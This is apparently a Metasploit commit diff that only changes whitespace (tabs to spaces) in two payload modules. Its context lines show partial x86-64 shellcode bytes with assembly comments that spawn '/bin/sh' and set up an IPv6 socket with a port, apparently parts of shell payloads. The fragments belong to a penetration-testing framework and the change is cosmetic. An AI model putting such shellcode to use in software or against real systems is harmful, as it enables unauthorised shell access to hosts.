\t removed

bug/bundler_fix
Balazs Bucsay 2015-05-02 21:16:50 +02:00
parent a0539cd672
commit 0b580acfb4
2 changed files with 3 additions and 3 deletions

View File

@ -69,7 +69,7 @@ module Metasploit3
"\x0f\x05" +# syscall #
"\x52" +# push %rdx #
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
"\x57" +# push %rdi #
"\x48\x89\xe7" +# mov %rsp,%rdi #
"\x52" +# push %rdx #

View File

@ -53,7 +53,7 @@ module Metasploit3
"\x04\x58" +# add $0x58,%al #
"\x0f\x05" +# syscall #
"\xe9\x23\x00\x00\x00" +# jmpq <forth> #
# back:
# back:
"\x5e" +# pop %rsi #
"\x6a\x1c" +# pushq $0x1c #
"\x5a" +# pop %rdx #
@ -72,7 +72,7 @@ module Metasploit3
"\x0f\x05" +# syscall #
# forth:
"\xe8\xd8\xff\xff\xff" +# callq <back> #
# sockaddr_in6
# sockaddr_in6
"\x00\x1c\x11\x5c" +# AF_INET6+port #
"\x00\x00\x00\x00" +# no-one-cares #
"\x00\x00\x00\x00" +# IPv6- #